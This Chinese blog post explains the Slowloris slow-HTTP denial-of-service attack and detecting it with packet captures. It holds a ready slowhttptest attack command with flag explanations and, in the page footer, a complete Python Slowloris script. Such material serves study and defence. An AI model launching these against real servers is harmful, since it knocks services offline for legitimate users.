Slowhttptest慢速攻击Slowloris模式攻击与检测

slowloris:完整的http请求是以 \r\n\r\n 结尾,攻击时仅发送 \r\n,少发送一个 \r\n,服务器认为请求还未发完,就会一直等待直至超时。

 攻击代码如下

slowhttptest -c 7000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u "url" -x 24 -p 3

解析:

-C 1000 (建立链接数1000个) -H (使用SlowLoris模式) -g(测试完成后建立统计数据) -o xxx(指定输出文件名) -i 10 (指定数据间的间隔) -r 200 (每秒链接200个) -t GET(默认GET请求) -u “xxx” (指定的URL) -x 24 (最大数据长度) -p 3(等待时间)

参数说明:

     -g      在测试完成后,以时间戳为名生成一个CVS和HTML文件的统计数据
     -H      SlowLoris模式
     -B      Slow POST模式
     -R      Range Header模式
     -X      Slow Read模式
     -c      number of connections 测试时建立的连接数
     -d      HTTP proxy host:port  为所有连接指定代理
     -e      HTTP proxy host:port  为探测连接指定代理
     -i      seconds 在slowrois和Slow POST模式中,指定发送数据间的间隔。
     -l      seconds 测试维持时间
     -n      seconds 在Slow Read模式下,指定每次操作的时间间隔。
     -o      file name 使用-g参数时,可以使用此参数指定输出文件名
     -p      seconds 指定等待时间来确认DoS攻击已经成功
     -r      connections per second 每秒连接个数
     -s      bytes 声明Content-Length header的值
     -t      HTTP verb 在请求时使用什么操作,默认GET
     -u      URL  指定目标url
     -v      level 日志等级(详细度)
     -w      bytes slow read模式中指定tcp窗口范围下限
     -x      bytes 在slowloris and Slow POST tests模式中,指定发送的最大数据长度
     -y      bytes slow read模式中指定tcp窗口范围上限
     -z      bytes 在每次的read()中,从buffer中读取数据量

分析:

当出现no的时候...就是网站沦陷的时候

 

 抓包检测:这里用到的工具“Wireshark”,“ 科来网络分析系统 2020 技术交流版”

攻击原理:

每个 HTTP 请求都是以空行结尾,即以两个 (\r\n)结 尾 。 若将空行去掉 ,即以 一个 (\r\n) 结尾,则服务器会一直等待直到超时。在等待过程中占用线程(连接数),服务器线程数量达到极限,则无法处理新的合法的 HTTP请求,达到DOS目的。

正常访问:

三次握手基础,当握手结束后,会发送FIN表示关闭链接。或者RST链接重置

慢速攻击:

 

第二次握手结束后,攻击软件会发送,PSH包 表示有DATA数据传输,让服务器一值保持链接,在等待的过程中占用线程(链接数),服务器线程数量达到极限,则无法处理新的合法的HTTP请求,达到DOS的目的。

 

 

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Slowloris攻击是一种利用HTTP协议的漏洞进行的拒绝服务(DoS)攻击。它通过发送大量的半连接(Half-open connections)来耗尽目标服务器的资源,从而使其无法正常响应其他合法用户的请求。 在Python中,可以使用socket库来实现Slowloris攻击。下面是一个简单的示例代码: ```python import socket import random import time def slowloris_attack(target_host, target_port, num_connections): # 创建指定数量的socket连接 sockets = [] for _ in range(num_connections): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((target_host, target_port)) sockets.append(s) # 发送HTTP请求头部 headers = "GET / HTTP/1.1\r\n" + \ "Host: " + target_host + "\r\n" + \ "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n" + \ "Accept-language: en-US,en,q=0.5\r\n" + \ "Connection: keep-alive\r\n" + \ "Content-Length: 42\r\n" # 持续发送数据 while True: for s in sockets: try: s.send(headers.encode()) except socket.error: sockets.remove(s) # 随机延迟发送时间 time.sleep(random.randint(1, 10)) # 使用示例 target_host = "example.com" target_port = 80 num_connections = 100 slowloris_attack(target_host, target_port, num_connections) ``` 请注意,上述代码仅供学习和研究目的,请勿用于非法用途。进行任何未经授权的攻击是违法行为,可能会导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值